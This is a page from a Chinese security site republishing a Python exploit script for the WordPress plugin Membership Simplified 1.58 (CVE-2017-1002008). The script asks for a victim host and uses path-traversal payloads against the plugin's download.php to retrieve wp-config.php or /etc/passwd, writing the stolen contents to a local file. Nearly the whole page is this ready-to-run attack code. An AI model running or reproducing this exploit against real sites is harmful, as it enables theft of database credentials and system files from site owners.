首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download 来源：vfocus.net 作者：The Martian 发布时间：2017-03-20   import requests import string import random from urlparse import urlparse   print "---------------------------------------------------------------------" print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187" print "---------------------------------------------------------------------" victim = raw_input("Please Enter victim host e.g. http://example.com: ") file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n") if file_choice == "1":     payload="..././..././..././wp-config.php" elif file_choice == "2":     payload="..././..././..././..././..././..././..././..././etc/passwd" else:     print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"     quit()  slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload target=victim+slug def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):     return ''.join(random.choice(chars) for _ in range(size))      def checkPlugin():     pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")     pluginExistence = pluginExists.status_code     if pluginExistence == 200:         print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."         exploit()     else:         print "Target has a funny code & might not be vulnerable, I will now exit\n"         quit()       def exploit():          getThatFile = requests.get(target)     fileState = getThatFile.status_code     breakApart=urlparse(victim)     extract_hostname=breakApart.netloc      randomDifferentiator=randomizeFile()     cleanName=str(randomDifferentiator)     if fileState == 200:     respFromThatFile = getThatFile.text     if file_choice == "1":         resultFile=extract_hostname+"_config_"+cleanName+".txt"         print resultFile         pwned=open(resultFile, 'w')         pwned.write(respFromThatFile)         pwned.close         print "Wordpress Config Written to "+resultFile     else:         resultFile=extract_hostname+"_passwd"+cleanName+".txt"         pwned=open(resultFile, 'w')         pwned.write(respFromThatFile)         pwned.close         print "Passwd File Written to "+resultFile     else:     print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState    if __name__ == "__main__":     checkPlugin()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Cerberus FTP Server 8.0.10.3 - ·Microsoft Edge 38.14393.0.0 - ·Windows DVD Maker 6.1.7 - XML ·FTPShell Client 6.53 - 'Sessio ·Microsoft Internet Information ·FTPShell Server 6.56 - 'Change ·Microsoft Edge Charkra Incorre ·ExtraPuTTY 0.29-RC2 - Denial o ·FTPShell Client 6.53 Buffer Ov ·Mozilla Firefox - 'table' Use- ·GitHub Enterprise 2.8.0 < 2.8. ·Microsoft Internet Explorer -   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved